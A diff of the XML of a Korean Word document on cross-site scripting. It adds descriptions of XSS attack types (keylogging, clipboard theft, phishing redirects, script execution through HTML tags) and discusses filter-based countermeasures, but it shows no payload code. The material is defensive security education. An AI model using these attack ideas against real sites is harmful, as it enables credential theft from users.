--- a/WebFilter/크로스 사이트 스크립팅 대응방안.docx
+++ b/WebFilter/크로스 사이트 스크립팅 대응방안.docx
@@ -35,33 +35,461 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve"> 대응방안</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>공격</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>개요</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>개요</w:t>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">XSS 공격은 주로 사용자의 인증정보를 가로채 공격자가 인증을 우회하기 위한 목적으로 활용되며 주로 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>를 출력하는 테스트 구문으로 취약점 여부를 테스트한다. 이 때문에</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>를 통한 인증정보 노출 방지</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>를</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 목</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">표로 하여 XSS을 활용한 다양한 공격 방식을 대비하지 못하는 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>두</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">는 경우가 있다. 이에 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>XSS를 활용한</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 다른 유형의 공격을 알아보고자 한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>공격</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>스크립트 구문 삽입을 이용해서 다른 사용자에게 피해를 입힐 수 있는 다양한 방법을 알아본다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>입력 값 탈취</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">키보드 입력 값을 가로채 기록하는 행위를 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>키로깅</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>(Keylogging)이라 한다. 다음은 짧은 스크립트 코드를 삽입하여 사용자의 입력 값을 가로채는 공격의 예시이다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>클립보드 값 탈취</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>키로깅</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 공격과 유사</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">하지만 클립보드에 존재하는 값을 가로챈다는 차이점이 있다. 다음은 클립보드 값을 가로채는 공격의 예시이다. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>피싱</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 사이트로 이동</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">미리 구성한 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>피싱</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 사이트로 사용자를 이동시켜 사용자의 아이디, 패스워드를 가로채는 공격의 예시이다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>HTML 태그를 이용한 스크립트 실행</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>결론</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">XSS 취약점은 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>사용자의 입력 값을 제대로 검증하지 않아 삽입된 스크립트 구문이 동작하는 것이 근본적인 원인이다. 특정 구문 기반 확인 방식은 취약점을 해결할 수 없다. 스크립트 구문이나 HTML 태그의 입력과 동작을 막는 것에 목표를 두고 지속적인 보안이 필요하다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="1"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>크로스</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 사이트 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>스크립팅</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 대응방안</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>개요</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
@@ -86,21 +514,51 @@
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 비교적 쉬운 테스트 코드로 인하여 쉽게 대응할 수 있을 것이라 생각할 수 있지만 상당한 복잡성을 가지고 있다. 이에 크로스 사이트 </w:t>
+        <w:t xml:space="preserve"> 비교적 쉬운 테스트 코드로 인하여 쉽게 대응할 수 있을 것이라 생각할 수 있지만 상당한 복잡성을 가지고 있다. 이에 </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>네이버의</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>스크립팅</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> 필터를 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>참고</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 필터를 제작하여 대응방안을 자세히 알아보고자 한다.</w:t>
+        <w:t xml:space="preserve">하여 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">상세한 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>대응방안을 자세히 알아보고자 한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -194,9 +652,6 @@
           <w:numId w:val="2"/>
         </w:numPr>
         <w:ind w:leftChars="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2547,7 +3002,7 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                 <w:b/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
@@ -2633,14 +3088,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
@@ -2702,9 +3150,6 @@
           <w:numId w:val="2"/>
         </w:numPr>
         <w:ind w:leftChars="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2747,18 +3192,158 @@
           <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">예외적으로 태그의 사용이 필요한 게시판과 같은 어플리케이션 존재 시 소스코드가 복잡해진다. </w:t>
+        <w:t>예외적으로 태그의 사용이 필요한 게시판과 같은 어플리케이션</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>에 바로 적용할 수 없으므로 HTML이 아닌 단순 텍스트 인자에 적합하다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">비즈니스 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>로직에</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 전달되는 경우</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">사용자 입력 값이 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>뷰에</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 노출시킬 목적이 아닌 비즈니스 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>로직에</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 사용될 경우 치환으로 인한 원본 데이터 훼손의 우려가 있다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>HTML 태그 사용이 필요한 경우</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>HTML 태그가 동작해야 하므로 White List 방식의 XSS 공격 구문 필터가 요구된다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>일괄적으로 필터를 적용하고자 하는 경우</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Servlet으로 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 공격 구문을 필터 한다</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>. 쉽게 적용할 수 있지만 입력 인자 모두에 적용되므로 의도치 않은 결과를 발생시킬 수 있으며, 필터가 불필요한 인자도 포함되므로 서비스 성능의 저하를 가져온다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="851" w:footer="992" w:gutter="0"/>
@@ -2772,7 +3357,7 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
   <w:abstractNum w:abstractNumId="0">
-    <w:nsid w:val="55137331"/>
+    <w:nsid w:val="33AD3F0F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="28245A22"/>
     <w:lvl w:ilvl="0" w:tplc="A5DEA456">
@@ -2861,6 +3446,184 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1">
+    <w:nsid w:val="55137331"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="28245A22"/>
+    <w:lvl w:ilvl="0" w:tplc="A5DEA456">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="upperLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1400" w:hanging="400"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="400"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2200" w:hanging="400"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="upperLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2600" w:hanging="400"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3000" w:hanging="400"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3400" w:hanging="400"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="upperLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3800" w:hanging="400"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4200" w:hanging="400"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2">
+    <w:nsid w:val="7B7804BA"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="82B49E82"/>
+    <w:lvl w:ilvl="0" w:tplc="0C6257B8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="upperLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1400" w:hanging="400"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="400"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2200" w:hanging="400"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="upperLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2600" w:hanging="400"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3000" w:hanging="400"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3400" w:hanging="400"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="upperLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
